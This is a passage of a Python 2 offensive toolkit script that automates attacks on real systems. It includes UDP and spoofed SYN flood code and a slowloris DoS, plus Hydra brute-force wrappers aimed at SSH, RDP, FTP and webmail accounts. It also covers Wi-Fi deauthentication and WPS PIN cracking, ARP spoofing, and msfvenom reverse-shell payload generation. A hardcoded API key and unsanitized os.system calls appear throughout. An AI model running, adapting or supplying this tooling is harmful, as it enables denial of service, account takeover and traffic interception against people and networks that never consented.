| \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def 